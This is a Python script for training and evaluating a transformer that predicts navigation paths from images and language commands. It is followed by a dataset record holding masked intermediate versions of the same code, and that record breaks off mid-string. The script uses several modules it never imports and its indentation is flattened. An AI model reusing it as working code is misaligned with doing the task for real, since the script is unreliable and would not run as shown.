from einops import rearrange
import logging
from tqdm import tqdm
import matplotlib
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib import gridspec
import numpy as np
import torch.autograd.profiler as profiler
from torch.nn import functional as F
from torch.optim.lr_scheduler import StepLR
from allennlp.training.scheduler import Scheduler
from allennlp.training.learning_rate_schedulers import NoamLR
import pandas as pd
from transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image
from metrics import MSEMetric, AccuracyMetric, F1Metric
from language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder
from navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser
from train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer
from navigation_transformer import NavigationTransformerEncoder
from train_transformer import TransformerTrainer
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self,
dataset_reader: NavigationDatasetReader,
encoder: TransformerEncoder,
optimizer: torch.optim.Optimizer,
scheduler: Scheduler,
num_epochs: int,
num_blocks: int,
device: torch.device,
checkpoint_dir: str,
num_models_to_keep: int,
generate_after_n: int,
resolution: int = 64,
patch_size: int = 8,
block_size: int = 4,
batch_size: int = 16,
output_type: str = "per-pixel",
checkpoint_every: int = 64,
validation_limit: int = 16,
depth: int = 7,
score_type: str = "acc",
best_epoch: int = -1,
seed: int = 12,
zero_weight: float = 0.05,
debug_image_top_k: int = None,
debug_image_threshold: float = None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[],
encoder=encoder,
optimizer=optimizer,
scheduler=scheduler,
num_epochs=num_epochs,
num_blocks=num_blocks,
device=device,
checkpoint_dir=checkpoint_dir,
num_models_to_keep=num_models_to_keep,
generate_after_n=generate_after_n,
score_type=score_type,
patch_size=patch_size,
block_size=block_size,
output_type=output_type,
resolution=resolution,
depth=depth,
best_epoch=best_epoch,
seed=seed,
zero_weight=zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # A negative value disables the corresponding debug-image filter;
        # guard against the None defaults before comparing.
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
        self.debug_image_top_k = debug_image_top_k
        self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i+self.batch_size]
small_batches.append(small_batch)
return small_batches
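    # Hedged note on split_large_batch: every tensor in the batch dict is
    # assumed to share the same leading batch dimension, so a large batch of,
    # say, 40 examples with self.batch_size == 16 is sliced into sub-batches
    # of 16, 16 and 8 that fit on the device one at a time.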
def validate_one_epoch(self, epoch, step, validation_limit):
print(f"Validating epoch {epoch} step {step}...")
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read("dev", validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
                score_dict = self.validate(small_batch, epoch, b, 0,
                                           self.debug_image_top_k,
                                           self.debug_image_threshold)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read("dev", self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f"Test-time pixel acc {mean_acc * 100}")
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f"Training epoch {epoch}...")
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read("train")):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
# skip bad examples
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step+1)
self.scheduler.step_batch(it)
#print(f"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}")
if (step+1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)
print(f"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}")
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f"{epoch}_{step}", is_best)
step += 1
print(f"skipped {skipped} examples")
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit)
print(f"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}")
if self.score_type == "acc":
return (epoch_acc)/2, -1.0
else:
raise AssertionError(f"invalid score type {self.score_type}")
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs["next_position"]
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
# binarize patches
next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
# any patch that has a 1 pixel in it gets 1
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches)
total_loss = next_pixel_loss
print(f"loss {total_loss.item()}")
return total_loss
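    @staticmethod
    def _binarize_patches_example():
        # Hedged sketch (not called by the trainer): the labelling rule used in
        # compute_patch_loss marks any patch containing at least one path pixel
        # as class 1 and every empty patch as class 0.
        tiles = torch.tensor([[[0.0, 0.0, 0.0, 0.0],
                               [0.0, 1.0, 0.0, 1.0]]])  # (1 batch, 2 patches, 4 pixels)
        sums = torch.sum(tiles, dim=2, keepdim=True)    # (1, 2, 1)
        labels = torch.zeros_like(sums)
        labels[sums != 0] = 1
        return labels.squeeze(-1).long()                # tensor([[0, 1]])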
def generate_debugging_image(self,
true_img,
path_state,
pred_path,
out_path,
caption = None,
top_k = None,
threshold = None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2,2, figsize=(16,16))
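        # Panel layout below: ax[0,0] ground-truth path mask, ax[0,1] caption
        # text, ax[1,0] input RGB image, ax[1,1] predicted next-path map.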
# gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])
text_ax = ax[0,1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize = 12)
text_ax.axis("off")
props = dict(boxstyle='round',
facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
# img_ax = plt.subplot(gs[2])
img_ax = ax[1,0]
#w = int(40 * (self.resolution / 224))
true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]
img_ax.imshow(true_img)
        true_path = path_state.detach().cpu().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)
true_ax = ax[0,0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1,:,:]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path<1.0] = 0
pred_path[top_k_inds] = 1.0
        elif threshold is not None:
            pred_path[pred_path < threshold] = 0
pred_path = np.tile(pred_path, (1,1,3)).astype(float)
pred_ax = ax[1,1]
pred_ax.imshow(pred_path)
file_path = f"{out_path}.png"
print(f"saving to {file_path}")
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size, output_type="per-patch", upsample=True)
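        # tiles_to_image maps the per-patch logits back to a pixel-resolution
        # class map (matching path_state) so the F1 below and the debugging
        # images can be computed at the pixel level.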
# f1 metric
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance["path_state"].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs["next_position"].shape[0]):
output_path = self.checkpoint_dir.joinpath(f"batch_{batch_num}").joinpath(f"instance_{i}")
output_path.mkdir(parents = True, exist_ok=True)
command = batch_instance["command"][i]
command = [x for x in command if x != "<PAD>"]
command = " ".join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance["path_state"][i]
pred_path = next_position[i]
self.generate_debugging_image(image,
path_state,
pred_path,
output_path,
caption = command,
top_k = top_k,
threshold = threshold)
return {"next_f1": next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-8
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1-pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
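    @staticmethod
    def _f1_worked_example():
        # Hedged illustration (not used anywhere in training): precision,
        # recall and F1 on a tiny 2x2 map where one of two predicted pixels
        # is correct -> precision 0.5, recall 1.0, F1 ~ 0.667.
        eps = 1e-8
        pred = torch.tensor([[1.0, 1.0], [0.0, 0.0]])
        gold = torch.tensor([[1.0, 0.0], [0.0, 0.0]])
        tp = torch.sum(pred * gold).item()            # 1.0
        fp = torch.sum(pred * (1 - gold)).item()      # 1.0
        fn = torch.sum((1 - pred) * gold).item()      # 0.0
        precision = tp / (tp + fp + eps)
        recall = tp / (tp + fn + eps)
        return 2 * (precision * recall) / (precision + recall + eps)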
def main(args):
device = "cpu"
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f"cuda:{free_gpu_id}"
#device = "cuda:0"
device = torch.device(device)
print(f"On device {device}")
#test = torch.ones((1))
#test = test.to(device)
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir = args.data_dir,
out_path = args.out_path,
path_width = args.path_width,
read_limit = args.read_limit,
batch_size = args.batch_size,
max_len = args.max_len,
tokenizer = tokenizer,
shuffle = args.shuffle,
overfit = args.overfit,
is_bert = "bert" in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath("vocab.json"), "w") as f1:
json.dump(list(train_vocab), f1)
else:
print(f"Reading vocab from {checkpoint_dir}")
with open(checkpoint_dir.joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
print(f"got data")
# construct the vocab and tokenizer
print(f"constructing model...")
# get the embedder from args
if args.embedder == "random":
embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)
elif args.embedder == "glove":
embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith("bert"):
embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len)
else:
raise NotImplementedError(f"No embedder {args.embedder}")
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size = args.resolution,
patch_size = args.patch_size,
language_embedder = embedder,
n_layers = args.n_layers,
channels = args.channels,
n_heads = args.n_heads,
hidden_dim = args.hidden_dim,
ff_dim = args.ff_dim,
dropout = args.dropout,
embed_dropout = args.embed_dropout,
output_type = args.output_type,
positional_encoding_type = args.pos_encoding_type,
device = device,
log_weights = args.test,
locality_mask = args.locality_mask,
locality_neighborhood = args.locality_neighborhood,
init_scale = args.init_scale)
# Initialize encoder
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
# construct optimizer
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
# scheduler
scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor)
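    # NoamLR (per "Attention Is All You Need") scales the learning rate as
    #   lr = lr_factor * hidden_dim**-0.5 * min(step**-0.5, step * warmup**-1.5)
    # i.e. linear warm-up for `warmup` steps, then inverse-square-root decay.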
best_epoch = -1
block_size = int((args.resolution * 4)/64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
# file exists
try:
assert(len(glob.glob(os.path.join(args.checkpoint_dir, "*.th"))) == 0)
except AssertionError:
raise AssertionError(f"Output directory {args.checkpoint_dir} non-empty, will not overwrite!")
else:
# resume from pre-trained
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
# get training info
best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath("best_training_state.json")))
print(f"best_checkpoint_data {best_checkpoint_data}")
best_epoch = best_checkpoint_data["epoch"]
# save arg config to checkpoint_dir
with open(pathlib.Path(args.checkpoint_dir).joinpath("config.yaml"), "w") as f1:
dump_args = copy.deepcopy(args)
# drop stuff we can't serialize
del(dump_args.__dict__["cfg"])
del(dump_args.__dict__["__cwd__"])
del(dump_args.__dict__["__path__"])
to_dump = dump_args.__dict__
# dump
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
# test-time, load best model
print(f"loading model weights from {args.checkpoint_dir}")
#state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"))
#encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
# construct trainer
trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,
encoder = encoder,
optimizer = optimizer,
scheduler = scheduler,
num_epochs = args.num_epochs,
num_blocks = num_blocks,
device = device,
checkpoint_dir = args.checkpoint_dir,
checkpoint_every = args.checkpoint_every,
validation_limit = args.validation_limit,
num_models_to_keep = args.num_models_to_keep,
generate_after_n = args.generate_after_n,
score_type=args.score_type,
depth = depth,
resolution = args.resolution,
output_type = args.output_type,
patch_size = args.patch_size,
block_size = block_size,
best_epoch = best_epoch,
seed = args.seed,
zero_weight = args.zero_weight,
debug_image_top_k = args.debug_image_top_k,
debug_image_threshold = args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f"evaluating")
acc = trainer.evaluate()
print(f"accuracy: {acc}")
if __name__ == "__main__":
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
|
normal
|
{
"blob_id": "04aacf9461ade2e229076ffdf85aca913037edad",
"index": 642,
"step-1": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, 
self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 
'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, 
self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, 